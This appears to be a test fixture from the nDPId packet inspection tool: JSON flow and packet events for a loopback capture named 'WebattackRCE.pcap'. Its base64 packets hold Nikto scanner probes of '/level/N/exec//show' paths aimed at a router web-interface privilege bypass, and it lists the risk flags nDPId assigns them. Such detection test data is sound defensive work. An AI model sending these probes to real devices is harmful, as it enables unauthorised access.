-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
